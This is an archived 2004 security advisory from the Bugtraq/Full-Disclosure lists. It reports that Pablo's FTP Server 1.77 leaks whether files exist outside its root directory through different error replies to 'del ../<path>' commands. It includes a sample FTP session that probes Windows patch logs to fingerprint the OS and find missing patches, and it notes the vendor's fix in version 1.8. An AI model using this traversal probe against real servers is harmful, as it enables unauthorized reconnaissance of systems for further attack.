lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200401182119.18704.webmaster@securiteinfo.com>
Date: Sun, 18 Jan 2004 21:19:18 +0100
From: scrap <webmaster@...uriteinfo.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Pablo Sofware Solutions FTP server can detect if a file exists outside the FTP root directory


Pablo Sofware Solutions FTP server can detect if a file exists outside the FTP 
root directory 


.oO Overview Oo.

Pablo Software Solutions FTP server version 1.77 can detect if a file exists 
outside the FTP root directory.
Discovered on 2004, January, 11th
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)

Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It 
comes with an easy to use interface and can be accessed from the system tray. 
The server handles all basic FTP commands and offers easy user account 
management and support for virtual directories. This FTP server can detect if 
a file exists outside the FTP root directory.


.oO Details Oo.

The vulnerability can be done using the MS-DOS ftp client. When you are logged 
on the server, you can send a del \..\<filename> supposed your root directory 
is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If 
<filename> doesn't exist, the FTP server answers "550 File not found."
In any case, the file is never deleted. That is normal.


.oO Exploit Oo.

Checking if a file exists on a remote system can be usefull to :

    * Fingerprint the OS. OSes don't have the same installed files by default. 
By this way, you can know if the remote system is Windows NT, or 2000 or 
XP...
    * Know the vulnerabilities of a system. By testing if 
"../WINNT/Q329115.log" exists, you can know if the remote system have this 
patch installed
    * Maybe some other interesting things...

Here is an example of the vulnerability :

C:\>ftp 127.0.0.1
Connecté à 127.0.0.1.
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp : 85 octets reçus dans 0,00Secondes 84000,00Ko/sec.
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit


.oO Solution Oo.

The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at 
http://www.pablovandermeer.nl/ftp_server.html


.oO Discovered by Oo.

Arnaud Jacques aka scrap
webmaster@...uriteinfo.com
http://www.securiteinfo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ